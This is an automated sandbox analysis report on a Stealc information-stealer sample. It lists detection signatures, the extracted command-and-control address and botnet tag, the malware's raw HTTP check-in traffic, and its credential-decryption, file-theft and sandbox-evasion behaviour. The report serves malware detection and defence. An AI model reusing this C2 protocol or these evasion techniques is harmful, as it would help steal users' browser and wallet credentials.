
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1528897
MD5: 555446e29069811f705b562473456397
SHA1: 4545adba658522cf1035be16883def9c888c79e3
SHA256: ca41747721e954859ba3e691ac62a90dd426459f5622cdd2729e34c1bc64fdbc
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 5476 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 555446E29069811F705B562473456397)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relied on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs / Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source | Rule | Description | Author
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security
00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.2239077197.000000000116E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000003.2197795166.0000000004D60000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
Process Memory Space: file.exe PID: 5476 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: file.exe PID: 5476 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
0.2.file.exe.3b0000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-08T12:32:11.465876+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49727 | 185.215.113.37 | 80 | TCP


AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.37/ | URL Reputation: Label: malware
Source: http://185.215.113.37 | URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php | URL Reputation: Label: malware
Source: 0.2.file.exe.3b0000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003BC820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003B7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003B9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003B9B60 CryptUnprotectData,LocalAlloc,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003C8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003C38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003C4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003BDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003BE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003BED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003C4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003BDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003BBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003BF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003C3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003B16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose

Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49727 -> 185.215.113.37:80
Source: Malware configuration extractor | URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Host: 185.215.113.37
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    POST /e2b1563c6670f193.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----AFHDAKJKFCFBGCBGDHCB
    Host: 185.215.113.37
    Content-Length: 211
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Raw: 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 39 36 35 41 38 37 38 32 46 44 37 32 32 38 34 35 38 32 31 32 37 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 2d 2d 0d 0a
    Data Ascii:
    ------AFHDAKJKFCFBGCBGDHCB
    Content-Disposition: form-data; name="hwid"

    4965A8782FD72284582127
    ------AFHDAKJKFCFBGCBGDHCB
    Content-Disposition: form-data; name="build"

    doma
    ------AFHDAKJKFCFBGCBGDHCB--
Source: Joe Sandbox View | IP Address: 185.215.113.37
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003B4880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle
Source: unknown | HTTP traffic detected:
    POST /e2b1563c6670f193.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----AFHDAKJKFCFBGCBGDHCB
    Host: 185.215.113.37
    Content-Length: 211
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Raw: 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 39 36 35 41 38 37 38 32 46 44 37 32 32 38 34 35 38 32 31 32 37 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 2d 2d 0d 0a
    Data Ascii:
    ------AFHDAKJKFCFBGCBGDHCB
    Content-Disposition: form-data; name="hwid"

    4965A8782FD72284582127
    ------AFHDAKJKFCFBGCBGDHCB
    Content-Disposition: form-data; name="build"

    doma
    ------AFHDAKJKFCFBGCBGDHCB--
Source: file.exe, 00000000.00000002.2239077197.000000000116E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.2239077197.00000000011C9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2239077197.00000000011B4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.2239077197.00000000011C9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.2239077197.000000000116E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.370

System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00778034
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0077D019
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006EF09B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00710157
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0077EACC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006562B5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007E63EC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00783BD9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00779C47
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00789446
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007764D4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0077B4CF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007B249E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007805C7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006C572E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0067972D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007BCF13
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0078578E
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 003B45C0 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: xsbjvjcw ZLIB complexity 0.994823391154661
Source: file.exe, 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2197795166.0000000004D60000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003C9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003C3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\G7H1AHDC.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: file.exe | Static file information: File size 1847808 > 1048576
Source: file.exe | Static PE information: Raw size of xsbjvjcw is bigger than: 0x100000 < 0x19d000

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.3b0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;xsbjvjcw:EW;jgzmrfrk:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;xsbjvjcw:EW;jgzmrfrk:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003C9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1cb1df should be: 0x1ccbfe
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: xsbjvjcw
Source: file.exe | Static PE information: section name: jgzmrfrk
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003CB035 push ecx; ret 0_2_003CB048
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0081B088 push ebp; mov dword ptr [esp], eax 0_2_0081B0C5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0083508F push ebx; mov dword ptr [esp], ecx 0_2_008350E4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0083508F push 644F6CA7h; mov dword ptr [esp], eax 0_2_0083511E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00801890 push edx; mov dword ptr [esp], 5D3E46FAh 0_2_008018AA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007E105D push 3E2B7995h; mov dword ptr [esp], ebx 0_2_007E1078
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0081B8BE push 75D9356Dh; mov dword ptr [esp], edx 0_2_0081B8FD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0081B8BE push ecx; mov dword ptr [esp], ebx 0_2_0081B97D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00778034 push 62E0091Ch; mov dword ptr [esp], ebx 0_2_00778062
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00778034 push esi; mov dword ptr [esp], edx 0_2_007780CA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00778034 push edi; mov dword ptr [esp], eax 0_2_007780FE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00778034 push edi; mov dword ptr [esp], esi 0_2_00778170
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00778034 push 69402000h; mov dword ptr [esp], ebp 0_2_00778228
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00778034 push esi; mov dword ptr [esp], edi 0_2_00778234
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00778034 push eax; mov dword ptr [esp], 7FC8922Fh 0_2_00778311
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00778034 push ebx; mov dword ptr [esp], eax 0_2_00778354
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00778034 push 1284A7A3h; mov dword ptr [esp], esi 0_2_0077835E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00778034 push 27D0C209h; mov dword ptr [esp], ecx 0_2_00778387
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00778034 push ebp; mov dword ptr [esp], 2A41ECF1h 0_2_007783C7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00778034 push 0D9B48D5h; mov dword ptr [esp], esi 0_2_00778410
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00778034 push ebx; mov dword ptr [esp], 4EFA3067h 0_2_0077841C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00778034 push 3AB3A41Ch; mov dword ptr [esp], ebp 0_2_0077844D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00778034 push 642B7EF2h; mov dword ptr [esp], edi 0_2_00778467
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00778034 push ecx; mov dword ptr [esp], edx 0_2_007784C3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00778034 push ecx; mov dword ptr [esp], 7D7D9107h 0_2_007784E6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00778034 push eax; mov dword ptr [esp], ecx 0_2_007785B7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00778034 push 3F00B22Fh; mov dword ptr [esp], eax 0_2_00778642
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00778034 push edi; mov dword ptr [esp], 5AF5F8CBh 0_2_00778652
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00778034 push 189D5995h; mov dword ptr [esp], edi 0_2_00778663
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00778034 push 6266E4B7h; mov dword ptr [esp], edx 0_2_00778694
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00778034 push 419FE50Dh; mov dword ptr [esp], esi 0_2_007786D9
Source: file.exe | Static PE information: section name: xsbjvjcw entropy: 7.9535443990541745

Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003C9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess graph_0-13594
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 611B16 second address: 611B1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 78DCBF second address: 78DCC4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 77CB2B second address: 77CB2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 78CE8C second address: 78CE93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop eax 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 78CFEB second address: 78D002 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5ED4EAF483h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 78D2A3 second address: 78D2E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F5ED52EEF85h 0x0000000a jnl 00007F5ED52EEF8Ah 0x00000010 push eax 0x00000011 push edx 0x00000012 jbe 00007F5ED52EEF76h 0x00000018 jno 00007F5ED52EEF76h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 78D425 second address: 78D42C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 78D42C second address: 78D455 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F5ED52EEF84h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jns 00007F5ED52EEF76h 0x00000018 push edi 0x00000019 pop edi 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 78D455 second address: 78D461 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jns 00007F5ED4EAF476h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 78D604 second address: 78D608 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 790A46 second address: 790A4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 790A4A second address: 790A79 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5ED52EEF82h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jg 00007F5ED52EEF8Bh 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F5ED52EEF7Dh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 790A79 second address: 790A8A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007F5ED4EAF476h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 790A8A second address: 790A8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 790B0B second address: 790B0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 790C8A second address: 790C90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 790DE2 second address: 790E32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F5ED4EAF488h 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push ebx 0x00000013 call 00007F5ED4EAF478h 0x00000018 pop ebx 0x00000019 mov dword ptr [esp+04h], ebx 0x0000001d add dword ptr [esp+04h], 00000014h 0x00000025 inc ebx 0x00000026 push ebx 0x00000027 ret 0x00000028 pop ebx 0x00000029 ret 0x0000002a mov dword ptr [ebp+122D1819h], eax 0x00000030 push 99160980h 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 pushad 0x00000039 popad 0x0000003a pop eax 0x0000003b rdtsc
